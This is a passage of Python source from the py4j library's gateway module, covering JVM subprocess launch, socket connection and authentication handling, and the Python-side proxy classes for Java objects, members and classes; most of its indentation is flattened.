might not be properly closed. This is not usually a problem, but in
case of errors related to file descriptors, set this flag to False.
:param java_path: If None, Py4J will use $JAVA_HOME/bin/java if $JAVA_HOME
is defined, otherwise it will use "java".
:param create_new_process_group: If True, the JVM is started in a new
process group. This ensures that signals sent to the parent Python
process are not forwarded to the JVM. For example, sending
Ctrl-C/SIGINT won't interrupt the JVM. If the python process dies, the
Java process will stay alive, which may be a problem for some scenarios
though.
:param enable_auth: If True, the server will require clients to provide an
authentication token when connecting.
:rtype: the port number of the `Gateway` server or, when auth enabled,
a 2-tuple with the port number and the auth token.
"""
popen_kwargs = {}
if not jarpath:
jarpath = find_jar_path()
if not java_path:
java_home = os.environ.get("JAVA_HOME")
if java_home:
java_path = os.path.join(java_home, "bin", "java")
else:
java_path = "java"
# Fail if the jar does not exist.
if not os.path.exists(jarpath):
raise Py4JError("Could not find py4j jar at {0}".format(jarpath))
# Launch the server in a subprocess.
classpath = os.pathsep.join((jarpath, classpath))
command = [java_path, "-classpath", classpath] + javaopts + \
["py4j.GatewayServer"]
if die_on_exit:
command.append("--die-on-broken-pipe")
if enable_auth:
command.append("--enable-auth")
command.append(str(port))
logger.debug("Launching gateway with command {0}".format(command))
# stderr redirection
close_stderr = False
if redirect_stderr is None:
stderr = open(os.devnull, "w")
close_stderr = True
elif isinstance(redirect_stderr, Queue) or\
isinstance(redirect_stderr, deque):
stderr = PIPE
else:
stderr = redirect_stderr
# we don't need this anymore
redirect_stderr = None
# stdout redirection
if redirect_stdout is None:
redirect_stdout = open(os.devnull, "w")
if create_new_process_group:
popen_kwargs.update(get_create_new_process_group_kwargs())
proc = Popen(command, stdout=PIPE, stdin=PIPE, stderr=stderr,
**popen_kwargs)
# Determine which port the server started on (needed to support
# ephemeral ports)
_port = int(proc.stdout.readline())
# Read the auth token from the server if enabled.
_auth_token = None
if enable_auth:
_auth_token = proc.stdout.readline()[:-1]
    # Start consumer threads so the process does not deadlock or hang
OutputConsumer(
redirect_stdout, proc.stdout, daemon=daemonize_redirect).start()
if redirect_stderr is not None:
OutputConsumer(
redirect_stderr, proc.stderr, daemon=daemonize_redirect).start()
ProcessConsumer(proc, [redirect_stdout], daemon=daemonize_redirect).start()
if close_stderr:
# XXX This will quiet ResourceWarning in Python 3.5+
        # This only closes the fd in this process, not in the JVM process, which
# makes sense.
quiet_close(stderr)
if enable_auth:
return (_port, _auth_token)
else:
return _port
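# Illustrative sketch (not part of the original py4j source, never called): one
# possible way to pair launch_gateway() with GatewayParameters and JavaGateway
# (the latter is defined further below in this module).
def _example_launch_and_connect():
    """Launch a JVM, call into it once, then shut it down."""
    port = launch_gateway(die_on_exit=True)
    gateway = JavaGateway(
        gateway_parameters=GatewayParameters(port=port))
    # Classes are resolved lazily through the jvm view.
    value = gateway.jvm.java.lang.Math.abs(-42)
    gateway.shutdown()
    return value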
def get_field(java_object, field_name):
"""Retrieves the field named `field_name` from the `java_object`.
This function is useful when `auto_field=false` in a gateway or
Java object.
:param java_object: the instance containing the field
:param field_name: the name of the field to retrieve
"""
command = proto.FIELD_COMMAND_NAME + proto.FIELD_GET_SUBCOMMAND_NAME +\
java_object._target_id + "\n" + field_name + "\n" +\
proto.END_COMMAND_PART
answer = java_object._gateway_client.send_command(command)
has_error, error_message = get_error_message(answer)
if answer == proto.NO_MEMBER_COMMAND or has_error:
message = compute_exception_message(
"no field {0} in object {1}".format(
field_name, java_object._target_id), error_message)
raise Py4JError(message)
else:
return get_return_value(
answer, java_object._gateway_client, java_object._target_id,
field_name)
def set_field(java_object, field_name, value):
"""Sets the field named `field_name` of `java_object` to `value`.
This function is the only way to set a field because the assignment
operator in Python cannot be overloaded.
:param java_object: the instance containing the field
:param field_name: the name of the field to set
:param value: the value to assign to the field
"""
command_part = get_command_part(
value,
java_object._gateway_client.gateway_property.pool)
command = proto.FIELD_COMMAND_NAME + proto.FIELD_SET_SUBCOMMAND_NAME +\
java_object._target_id + "\n" + field_name + "\n" +\
command_part + proto.END_COMMAND_PART
answer = java_object._gateway_client.send_command(command)
has_error, error_message = get_error_message(answer)
if answer == proto.NO_MEMBER_COMMAND or has_error:
message = compute_exception_message(
"no field {0} in object {1}".format(
field_name, java_object._target_id), error_message)
raise Py4JError(message)
return get_return_value(
answer, java_object._gateway_client, java_object._target_id,
field_name)
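# Example sketch (hypothetical object): with auto_field left at its default of
# False, public fields are read and written explicitly, e.g.
#   count = get_field(java_counter, "count")
#   set_field(java_counter, "count", count + 1)
# where java_counter is assumed to be a JavaObject exposing a public 'count' field.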
def get_method(java_object, method_name):
"""Retrieves a reference to the method of an object.
This function is useful when `auto_field=true` and an instance field has
the same name as a method. The full signature of the method is not
required: it is determined when the method is called.
:param java_object: the instance containing the method
:param method_name: the name of the method to retrieve
"""
return JavaMember(
method_name, java_object, java_object._target_id,
java_object._gateway_client)
def is_instance_of(gateway, java_object, java_class):
"""Indicates whether a java object is an instance of the provided
java_class.
:param gateway: the JavaGateway instance
:param java_object: the JavaObject instance
:param java_class: can be a string (fully qualified name), a JavaClass
        instance, or a JavaObject instance
"""
if isinstance(java_class, basestring):
param = java_class
elif isinstance(java_class, JavaClass):
param = java_class._fqn
elif isinstance(java_class, JavaObject):
param = java_class.getClass()
else:
raise Py4JError(
"java_class must be a string, a JavaClass, or a JavaObject")
return gateway.jvm.py4j.reflection.TypeUtil.isInstanceOf(
param, java_object)
def get_java_class(java_class):
"""Returns the java.lang.Class of a JavaClass. This is equivalent to
calling .class in Java.
:param java_class: An instance of JavaClass
:rtype: An instance of JavaObject that corresponds to a java.lang.Class
"""
return java_class._java_lang_class
def quiet_close(closable):
"""Quietly closes a closable object without throwing an exception.
:param closable: Object with a ``close`` method.
"""
if closable is None:
    # Do not attempt to close a None; that would only log unnecessary exceptions.
return
try:
closable.close()
except Exception:
logger.debug("Exception while closing", exc_info=True)
def quiet_shutdown(socket_instance):
"""Quietly shuts down a socket without throwing an exception.
:param socket_instance: Socket with ``shutdown`` method.
"""
if socket_instance is None:
    # Do not attempt to shut down a None; that would only log unnecessary exceptions.
return
try:
socket_instance.shutdown(socket.SHUT_RDWR)
except Exception:
logger.debug("Exception while shutting down a socket", exc_info=True)
def set_linger(a_socket):
"""Sets SO_LINGER to true, 0 to send a RST packet. This forcibly closes the
connection and the remote socket should fail on write and should not need
to read to realize that the socket was closed.
Only use on timeout and maybe shutdown because it does not terminate the
TCP connection normally.
"""
l_onoff = 1
l_linger = 0
a_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack(b'ii', l_onoff, l_linger))
def check_connection(a_socket, read_timeout):
"""Checks that a socket is ready to receive by reading from it.
If the read times out, this is a good sign. If the read returns an
empty string, this usually means that the socket was remotely closed.
:param a_socket: The socket to read from.
:param read_timeout: The read_timeout to restore the socket to.
"""
a_socket.settimeout(0.0001)
response = 0
try:
response = a_socket.recv(2)
except socket.timeout:
# Do nothing this is expected!
pass
finally:
a_socket.settimeout(read_timeout)
if response == b"":
raise Exception("The connection was remotely closed.")
def gateway_help(gateway_client, var, pattern=None, short_name=True,
display=True):
"""Displays a help page about a class or an object.
    :param gateway_client: The gateway client
:param var: JavaObject, JavaClass or JavaMember for which a help page
will be generated.
:param pattern: Star-pattern used to filter the members. For example
"get*Foo" may return getMyFoo, getFoo, getFooBar, but not bargetFoo.
The pattern is matched against the entire signature. To match only
the name of a method, use "methodName(*".
:param short_name: If True, only the simple name of the parameter
types and return types will be displayed. If False, the fully
qualified name of the types will be displayed.
:param display: If True, the help page is displayed in an interactive
page similar to the `help` command in Python. If False, the page is
returned as a string.
"""
if hasattr2(var, "_get_object_id"):
command = proto.HELP_COMMAND_NAME +\
proto.HELP_OBJECT_SUBCOMMAND_NAME +\
var._get_object_id() + "\n" +\
get_command_part(pattern) +\
get_command_part(short_name) +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
elif hasattr2(var, "_fqn"):
command = proto.HELP_COMMAND_NAME +\
proto.HELP_CLASS_SUBCOMMAND_NAME +\
var._fqn + "\n" +\
get_command_part(pattern) +\
get_command_part(short_name) +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
elif hasattr2(var, "container") and hasattr2(var, "name"):
if pattern is not None:
raise Py4JError("pattern should be None with var is a JavaMember")
pattern = var.name + "(*"
var = var.container
return gateway_help(
gateway_client, var, pattern, short_name=short_name,
display=display)
else:
raise Py4JError(
"var is none of Java Object, Java Class or Java Member")
help_page = get_return_value(answer, gateway_client, None, None)
if (display):
pager(help_page)
else:
return help_page
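# Example sketch (hypothetical names): the help page can be captured instead of
# paged, e.g.
#   page = gateway_help(client, java_list, pattern="add*", display=False)
#   print(page)
# where client is a GatewayClient and java_list is any JavaObject.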
def do_client_auth(command, input_stream, sock, auth_token):
"""Receives and decodes a auth token.
- If the token does not match, an exception is raised.
- If the command received is not an Auth command, an exception is raised.
- If an exception occurs, it is wrapped in a Py4JAuthenticationError.
- Otherwise, it returns True.
"""
try:
if command != proto.AUTH_COMMAND_NAME:
raise Py4JAuthenticationError("Expected {}, received {}.".format(
proto.AUTH_COMMAND_NAME, command))
client_token = smart_decode(input_stream.readline()[:-1])
# Remove the END marker
input_stream.readline()
if auth_token == client_token:
success = proto.OUTPUT_VOID_COMMAND.encode("utf-8")
sock.sendall(success)
else:
error = proto.ERROR_RETURN_MESSAGE.encode("utf-8")
# TODO AUTH Send error message with the error?
sock.sendall(error)
raise Py4JAuthenticationError("Client authentication failed.")
except Py4JAuthenticationError:
raise
except Exception as e:
logger.exception(
"An exception occurred while trying to authenticate "
"a connection")
raise Py4JAuthenticationError(cause=e)
return True
def _garbage_collect_object(gateway_client, target_id):
try:
ThreadSafeFinalizer.remove_finalizer(
smart_decode(gateway_client.address) +
smart_decode(gateway_client.port) +
target_id)
gateway_client.garbage_collect_object(target_id)
except Exception:
logger.debug("Exception while garbage collecting an object",
exc_info=True)
def _garbage_collect_connection(socket_instance):
"""Closes the socket if auto_delete is True and the socket is opened.
This is an acceptable practice if you know that your Python VM implements
garbage collection and closing sockets immediately is not a concern.
Otherwise, it is always better (because it is predictable) to explicitly
close the socket by calling `GatewayConnection.close()`.
"""
if socket_instance is not None:
quiet_shutdown(socket_instance)
quiet_close(socket_instance)
class OutputConsumer(CompatThread):
"""Thread that consumes output
"""
def __init__(self, redirect, stream, *args, **kwargs):
super(OutputConsumer, self).__init__(*args, **kwargs)
self.redirect = redirect
self.stream = stream
if isinstance(redirect, Queue):
self.redirect_func = self._pipe_queue
if isinstance(redirect, deque):
self.redirect_func = self._pipe_deque
if hasattr2(redirect, "write"):
self.redirect_func = self._pipe_fd
def _pipe_queue(self, line):
self.redirect.put(line)
def _pipe_deque(self, line):
self.redirect.appendleft(line)
def _pipe_fd(self, line):
self.redirect.write(line)
def run(self):
lines_iterator = iter(self.stream.readline, b"")
for line in lines_iterator:
self.redirect_func(smart_decode(line))
class ProcessConsumer(CompatThread):
"""Thread that ensures process stdout and stderr are properly closed.
"""
def __init__(self, proc, closable_list, *args, **kwargs):
super(ProcessConsumer, self).__init__(*args, **kwargs)
self.proc = proc
if closable_list:
# We don't care if it contains queues or deques, quiet_close will
# just ignore them.
self.closable_list = closable_list
else:
self.closable_list = []
def run(self):
self.proc.wait()
quiet_close(self.proc.stdout)
quiet_close(self.proc.stderr)
for closable in self.closable_list:
quiet_close(closable)
class GatewayParameters(object):
"""Wrapper class that contains all parameters that can be passed to
configure a `JavaGateway`
"""
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PORT, auto_field=False,
auto_close=True, auto_convert=False, eager_load=False,
ssl_context=None, enable_memory_management=True,
read_timeout=None, auth_token=None):
"""
:param address: the address to which the client will request a
            connection. If you're passing an `SSLContext` with
`check_hostname=True` then this address must match
(one of) the hostname(s) in the certificate the gateway
server presents.
:param port: the port to which the client will request a connection.
Default is 25333.
:param auto_field: if `False`, each object accessed through this
gateway won"t try to lookup fields (they will be accessible only by
calling get_field). If `True`, fields will be automatically looked
up, possibly hiding methods of the same name and making method
calls less efficient.
:param auto_close: if `True`, the connections created by the client
close the socket when they are garbage collected.
:param auto_convert: if `True`, try to automatically convert Python
objects like sequences and maps to Java Objects. Default value is
`False` to improve performance and because it is still possible to
explicitly perform this conversion.
:param eager_load: if `True`, the gateway tries to connect to the JVM
by calling System.currentTimeMillis. If the gateway cannot connect
to the JVM, it shuts down itself and raises an exception.
:param ssl_context: if not None, SSL connections will be made using
this SSLContext
:param enable_memory_management: if True, tells the Java side when a
JavaObject (reference to an object on the Java side) is garbage
collected on the Python side.
:param read_timeout: if > 0, sets a timeout in seconds after
which the socket stops waiting for a response from the Java side.
        :param auth_token: if provided, an authentication token that clients
must provide to the server when connecting.
"""
self.address = address
self.port = port
self.auto_field = auto_field
self.auto_close = auto_close
self.auto_convert = auto_convert
self.eager_load = eager_load
self.ssl_context = ssl_context
self.enable_memory_management = enable_memory_management
self.read_timeout = read_timeout
self.auth_token = escape_new_line(auth_token)
class CallbackServerParameters(object):
"""Wrapper class that contains all parameters that can be passed to
configure a `CallbackServer`
"""
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PYTHON_PROXY_PORT,
daemonize=False, daemonize_connections=False, eager_load=True,
ssl_context=None,
accept_timeout=DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER,
read_timeout=None, propagate_java_exceptions=False,
auth_token=None):
"""
:param address: the address to which the client will request a
connection
:param port: the port to which the client will request a connection.
            Default is 25334.
:param daemonize: If `True`, will set the daemon property of the server
thread to True. The callback server will exit automatically if all
the other threads exit.
:param daemonize_connections: If `True`, callback server connections
are executed in daemonized threads and will not block the exit of a
program if non daemonized threads are finished.
:param eager_load: If `True`, the callback server is automatically
started when the JavaGateway is created.
:param ssl_context: if not None, the SSLContext's certificate will be
presented to callback connections.
        :param accept_timeout: if > 0, sets a timeout in seconds after which
            the callback server stops waiting for a connection, sees if the
            callback server should shut down, and if not, waits again for a
            connection. The default is 5 seconds: this roughly means that
            it can take up to 5 seconds to shut down the callback server.
:param read_timeout: if > 0, sets a timeout in seconds after
which the socket stops waiting for a call or command from the
Java side.
:param propagate_java_exceptions: if `True`, any `Py4JJavaError` raised
by a Python callback will cause the nested `java_exception` to be
thrown on the Java side. If `False`, the `Py4JJavaError` will
manifest as a `Py4JException` on the Java side, just as with any
other kind of Python exception. Setting this option is useful if
you need to implement a Java interface where the user of the
interface has special handling for specific Java exception types.
:param auth_token: if provided, an authentication token that clients
must provide to the server when connecting.
"""
self.address = address
self.port = port
self.daemonize = daemonize
self.daemonize_connections = daemonize_connections
self.eager_load = eager_load
self.ssl_context = ssl_context
if accept_timeout == DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER:
# This is to support deprecated function call...
# TODO Remove "DEFAULT" once we remove the deprecated function
# call.
accept_timeout = DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT
self.accept_timeout = accept_timeout
self.read_timeout = read_timeout
self.propagate_java_exceptions = propagate_java_exceptions
self.auth_token = escape_new_line(auth_token)
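# Illustrative sketch (not part of the original source): these parameters are
# typically handed to JavaGateway (defined later in this module), e.g.
#   gateway = JavaGateway(
#       callback_server_parameters=CallbackServerParameters(daemonize=True))
# which starts a CallbackServer so the JVM can call back into Python objects.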
class DummyRLock(object):
def __init__(self):
pass
def acquire(self, blocking=1):
pass
def release(self):
pass
def __enter__(self):
pass
def __exit__(self, type, value, tb):
pass
class GatewayConnectionGuard(object):
def __init__(self, client, connection):
self._client = client
self._connection = connection
def __enter__(self):
return self
def read(self, hint=-1):
return self._connection.stream.read(hint)
def __exit__(self, type, value, traceback):
if value is None:
self._client._give_back_connection(self._connection)
else:
self._connection.close()
class GatewayClient(object):
"""Responsible for managing connections to the JavaGateway.
This implementation is thread-safe and connections are created on-demand.
This means that Py4J-Python can be accessed by multiple threads and
messages are sent to and processed concurrently by the Java Gateway.
When creating a custom :class:`JavaGateway`, it is recommended to pass an
instance of :class:`GatewayClient` instead of a :class:`GatewayConnection`:
both have the same interface, but the client supports multiple threads and
connections, which is essential when using callbacks. """
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PORT,
auto_close=True, gateway_property=None,
ssl_context=None, gateway_parameters=None):
"""
:param gateway_parameters: the set of parameters used to configure the
GatewayClient.
:param gateway_property: used to keep gateway preferences without a
cycle with the gateway
"""
if address != DEFAULT_ADDRESS:
deprecated("GatewayClient.address", "1.0", "GatewayParameters")
if port != DEFAULT_PORT:
deprecated("GatewayClient.port", "1.0", "GatewayParameters")
if not gateway_parameters:
gateway_parameters = GatewayParameters(
address=address, port=port, auto_close=auto_close,
ssl_context=ssl_context)
self.gateway_parameters = gateway_parameters
self.address = gateway_parameters.address
self.port = gateway_parameters.port
self.is_connected = True
self.auto_close = gateway_parameters.auto_close
self.gateway_property = gateway_property
self.ssl_context = gateway_parameters.ssl_context
self.deque = deque()
def garbage_collect_object(self, target_id):
"""Tells the Java side that there is no longer a reference to this
JavaObject on the Python side.
"""
if target_id != proto.ENTRY_POINT_OBJECT_ID and\
target_id != proto.GATEWAY_SERVER_OBJECT_ID and\
self.is_connected:
try:
self.send_command(
proto.MEMORY_COMMAND_NAME +
proto.MEMORY_DEL_SUBCOMMAND_NAME +
target_id +
"\ne\n")
except Exception:
logger.debug("Exception while garbage collecting an object",
exc_info=True)
def _get_connection(self):
if not self.is_connected:
raise Py4JNetworkError("Gateway is not connected.")
try:
connection = self.deque.pop()
except IndexError:
connection = self._create_connection()
return connection
def _create_connection(self):
connection = GatewayConnection(
self.gateway_parameters, self.gateway_property)
connection.start()
return connection
def _give_back_connection(self, connection):
try:
self.deque.append(connection)
except Exception:
logger.warning(
"Exception while giving back connection", exc_info=True)
def shutdown_gateway(self):
"""Sends a shutdown command to the gateway. This will close the
gateway server: all active connections will be closed. This may
be useful if the lifecycle of the Java program must be tied to
the Python program.
"""
connection = self._get_connection()
try:
connection.shutdown_gateway()
self.close()
self.is_connected = False
except Py4JNetworkError:
logger.debug("Error while shutting down gateway.", exc_info=True)
self.shutdown_gateway()
def send_command(self, command, retry=True, binary=False):
"""Sends a command to the JVM. This method is not intended to be
called directly by Py4J users. It is usually called by
:class:`JavaMember` instances.
:param command: the `string` command to send to the JVM. The command
must follow the Py4J protocol.
:param retry: if `True`, the GatewayClient tries to resend a message
if it fails.
:param binary: if `True`, we won't wait for a Py4J-protocol response
from the other end; we'll just return the raw connection to the
caller. The caller becomes the owner of the connection, and is
            responsible for closing the connection (or returning it to this
`GatewayClient` pool using `_give_back_connection`).
:rtype: the `string` answer received from the JVM (The answer follows
the Py4J protocol). The guarded `GatewayConnection` is also returned
if `binary` is `True`.
"""
connection = self._get_connection()
try:
response = connection.send_command(command)
if binary:
return response, self._create_connection_guard(connection)
elif is_fatal_error(response):
connection.close(False)
else:
self._give_back_connection(connection)
except Py4JNetworkError as pne:
if connection:
reset = False
if isinstance(pne.cause, socket.timeout):
reset = True
connection.close(reset)
if self._should_retry(retry, connection, pne):
logging.info("Exception while sending command.", exc_info=True)
response = self.send_command(command, binary=binary)
else:
logging.exception(
"Exception while sending command.")
response = proto.ERROR
return response
def _create_connection_guard(self, connection):
return GatewayConnectionGuard(self, connection)
def _should_retry(self, retry, connection, pne=None):
return pne and pne.when == proto.ERROR_ON_SEND
def close(self):
"""Closes all currently opened connections.
This operation is not thread safe and is only a best effort strategy
to close active connections.
All connections are guaranteed to be closed only if no other thread
is accessing the client and no call is pending.
"""
size = len(self.deque)
for _ in range(0, size):
try:
connection = self.deque.pop()
quiet_close(connection)
except IndexError:
pass
class GatewayConnection(object):
"""Default gateway connection (socket based) responsible for communicating
with the Java Virtual Machine."""
def __init__(self, gateway_parameters, gateway_property=None):
"""
:param gateway_parameters: the set of parameters used to configure the
GatewayClient.
:param gateway_property: contains gateway preferences to avoid a cycle
with gateway
"""
self.gateway_parameters = gateway_parameters
self.address = gateway_parameters.address
self.port = gateway_parameters.port
af_type = socket.getaddrinfo(self.address, self.port)[0][0]
self.socket = socket.socket(af_type, socket.SOCK_STREAM)
if gateway_parameters.read_timeout:
self.socket.settimeout(gateway_parameters.read_timeout)
if gateway_parameters.ssl_context:
self.socket = gateway_parameters.ssl_context.wrap_socket(
self.socket, server_hostname=self.address)
self.is_connected = False
self.auto_close = gateway_parameters.auto_close
self.gateway_property = gateway_property
self.wr = weakref.ref(
self,
lambda wr, socket_instance=self.socket:
_garbage_collect_connection and
_garbage_collect_connection(socket_instance))
def start(self):
"""Starts the connection by connecting to the `address` and the `port`
"""
try:
self.socket.connect((self.address, self.port))
self.stream = self.socket.makefile("rb")
self.is_connected = True
self._authenticate_connection()
except Py4JAuthenticationError:
logger.exception("Cannot authenticate with gateway server.")
raise
except Exception as e:
msg = "An error occurred while trying to connect to the Java "\
"server ({0}:{1})".format(self.address, self.port)
logger.exception(msg)
raise Py4JNetworkError(msg, e)
def _authenticate_connection(self):
if self.gateway_parameters.auth_token:
cmd = "{0}\n{1}\n".format(
proto.AUTH_COMMAND_NAME,
self.gateway_parameters.auth_token
)
answer = self.send_command(cmd)
error, _ = proto.is_error(answer)
if error:
# At this point we do not expect the caller to clean
# the connection so we clean ourselves.
self.close(reset=True)
raise Py4JAuthenticationError(
"Failed to authenticate with gateway server.")
def close(self, reset=False):
"""Closes the connection by closing the socket.
If reset is True, sends a RST packet with SO_LINGER
"""
if reset:
set_linger(self.socket)
else:
            # Send a shutdown before attempting to close the stream or socket.
quiet_shutdown(self.socket)
quiet_close(self.stream)
quiet_close(self.socket)
self.is_connected = False
def shutdown_gateway(self):
"""Sends a shutdown command to the gateway. This will close the gateway
server: all active connections will be closed. This may be useful
if the lifecycle of the Java program must be tied to the Python
program.
"""
if not self.is_connected:
raise Py4JError("Gateway must be connected to send shutdown cmd.")
try:
quiet_close(self.stream)
self.socket.sendall(
proto.SHUTDOWN_GATEWAY_COMMAND_NAME.encode("utf-8"))
quiet_close(self.socket)
self.is_connected = False
except Exception:
# Do nothing! Exceptions might occur anyway.
logger.debug("Exception occurred while shutting down gateway",
exc_info=True)
def send_command(self, command):
"""Sends a command to the JVM. This method is not intended to be
called directly by Py4J users: it is usually called by JavaMember
instances.
:param command: the `string` command to send to the JVM. The command
must follow the Py4J protocol.
:rtype: the `string` answer received from the JVM (The answer follows
the Py4J protocol).
"""
logger.debug("Command to send: {0}".format(command))
try:
# Write will only fail if remote is closed for large payloads or
# if it sent a RST packet (SO_LINGER)
self.socket.sendall(command.encode("utf-8"))
except Exception as e:
logger.info("Error while sending.", exc_info=True)
raise Py4JNetworkError(
"Error while sending", e, proto.ERROR_ON_SEND)
try:
answer = smart_decode(self.stream.readline()[:-1])
logger.debug("Answer received: {0}".format(answer))
if answer.startswith(proto.RETURN_MESSAGE):
answer = answer[1:]
            # Happens when the other end is dead. There might be an empty
# answer before the socket raises an error.
if answer.strip() == "":
raise Py4JNetworkError("Answer from Java side is empty")
return answer
except Exception as e:
logger.info("Error while receiving.", exc_info=True)
raise Py4JNetworkError(
"Error while receiving", e, proto.ERROR_ON_RECEIVE)
class JavaMember(object):
"""Represents a member (i.e., method) of a :class:`JavaObject`. For now,
only methods are supported. Fields are retrieved directly and are not
contained in a JavaMember.
"""
def __init__(self, name, container, target_id, gateway_client):
self.name = name
self.container = container
self.target_id = target_id
self.gateway_client = gateway_client
self.command_header = self.target_id + "\n" + self.name + "\n"
self.pool = self.gateway_client.gateway_property.pool
self.converters = self.gateway_client.converters
self._gateway_doc = None
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self.gateway_client, self, display=False)
return self._gateway_doc
def _get_args(self, args):
temp_args = []
new_args = []
for arg in args:
if not isinstance(arg, JavaObject):
for converter in self.gateway_client.converters:
if converter.can_convert(arg):
temp_arg = converter.convert(arg, self.gateway_client)
temp_args.append(temp_arg)
new_args.append(temp_arg)
break
else:
new_args.append(arg)
else:
new_args.append(arg)
return (new_args, temp_args)
def _build_args(self, *args):
if self.converters is not None and len(self.converters) > 0:
(new_args, temp_args) = self._get_args(args)
else:
new_args = args
temp_args = []
args_command = "".join(
[get_command_part(arg, self.pool) for arg in new_args])
return args_command, temp_args
def stream(self, *args):
"""
Call the method using the 'binary' protocol.
:rtype: The `GatewayConnection` that the call command was sent to.
"""
args_command, temp_args = self._build_args(*args)
command = proto.STREAM_COMMAND_NAME +\
self.command_header +\
args_command +\
proto.END_COMMAND_PART
answer, connection = self.gateway_client.send_command(
command, binary=True)
# parse the return value to throw an exception if necessary
get_return_value(
answer, self.gateway_client, self.target_id, self.name)
for temp_arg in temp_args:
temp_arg._detach()
return connection
def __call__(self, *args):
args_command, temp_args = self._build_args(*args)
command = proto.CALL_COMMAND_NAME +\
self.command_header +\
args_command +\
proto.END_COMMAND_PART
answer = self.gateway_client.send_command(command)
return_value = get_return_value(
answer, self.gateway_client, self.target_id, self.name)
for temp_arg in temp_args:
temp_arg._detach()
return return_value
class JavaObject(object):
"""Represents a Java object from which you can call methods or access
fields."""
def __init__(self, target_id, gateway_client):
"""
:param target_id: the identifier of the object on the JVM side. Given
by the JVM.
:param gateway_client: the gateway client used to communicate with
the JVM.
"""
self._target_id = target_id
self._gateway_client = gateway_client
self._auto_field = gateway_client.gateway_property.auto_field
self._methods = {}
self._field_names = set()
self._fully_populated = False
self._gateway_doc = None
key = smart_decode(self._gateway_client.address) +\
smart_decode(self._gateway_client.port) +\
self._target_id
if self._gateway_client.gateway_property.enable_memory_management:
value = weakref.ref(
self,
lambda wr, cc=self._gateway_client, id=self._target_id:
_garbage_collect_object and _garbage_collect_object(cc, id))
ThreadSafeFinalizer.add_finalizer(key, value)
def _detach(self):
_garbage_collect_object(self._gateway_client, self._target_id)
def _get_object_id(self):
return self._target_id
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self._gateway_client, self, display=False)
return self._gateway_doc
def __getattr__(self, name):
if name == "__call__":
# Provide an explicit definition for __call__ so that a JavaMember
# does not get created for it. This serves two purposes:
# 1) IPython (and others?) stop showing incorrect help indicating
# that this is callable
# 2) A TypeError(object not callable) is raised if someone does try
# to call here
raise AttributeError
if name not in self._methods:
if (self._auto_field):
(is_field, return_value) = self._get_field(name)
if (is_field):
self._field_names.add(name)
return return_value
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
self._methods[name] = JavaMember(
name, self, self._target_id, self._gateway_client)
# The name is a method
return self._methods[name]
def __dir__(self):
self._populate_fields()
return list(set(self._methods.keys()) | self._field_names)
def _populate_fields(self):
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
if not self._fully_populated:
if self._auto_field:
command = proto.DIR_COMMAND_NAME +\
proto.DIR_FIELDS_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._target_id, "__dir__")
self._field_names.update(return_value.split("\n"))
command = proto.DIR_COMMAND_NAME +\
proto.DIR_METHODS_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._target_id, "__dir__")
names = return_value.split("\n")
for name in names:
if name not in self._methods:
self._methods[name] = JavaMember(
name, self, self._target_id, self._gateway_client)
self._fully_populated = True
def _get_field(self, name):
command = proto.FIELD_COMMAND_NAME +\
proto.FIELD_GET_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
name + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if answer == proto.NO_MEMBER_COMMAND or is_error(answer)[0]:
return (False, None)
else:
return_value = get_return_value(
answer, self._gateway_client, self._target_id, name)
return (True, return_value)
def __eq__(self, other):
if other is None:
return False
elif (hasattr2(other, "_get_object_id")):
return self.equals(other)
else:
return other.__eq__(self)
def __hash__(self):
return self.hashCode()
def __str__(self):
return self.toString()
def __repr__(self):
# For now...
return "JavaObject id=" + self._target_id
class JavaClass(object):
"""A `JavaClass` represents a Java Class from which static members can be
retrieved. `JavaClass` instances are also needed to initialize an array.
Usually, `JavaClass` instances are not initialized using their constructor;
they are created while accessing the `jvm` property of a gateway, e.g.,
`gateway.jvm.java.lang.String`.
"""
def __init__(self, fqn, gateway_client):
self._fqn = fqn
self._gateway_client = gateway_client
self._pool = self._gateway_client.gateway_property.pool
self._command_header = fqn + "\n"
self._converters = self._gateway_client.converters
self._gateway_doc = None
self._statics = None
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self._gateway_client, self, display=False)
return self._gateway_doc
def __dir__(self):
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
if self._statics is None:
command = proto.DIR_COMMAND_NAME +\
proto.DIR_STATIC_SUBCOMMAND_NAME +\
self._fqn + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._fqn, "__dir__")
self._statics = return_value.split("\n")
return self._statics[:]
@property
def _java_lang_class(self):
"""Gets the java.lang.Class of the current JavaClass. This is
equivalent to calling .class in Java.
"""
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_JAVA_LANG_CLASS_SUB_COMMAND_NAME +\
self._fqn + "\n" + proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if len(answer) > 1 and answer[0] == proto.SUCCESS:
return get_return_value(
answer, self._gateway_client, self._fqn, "_java_lang_class")
else:
raise Py4JError(
"{0} does not exist in the JVM".format(self._fqn))
def __getattr__(self, name):
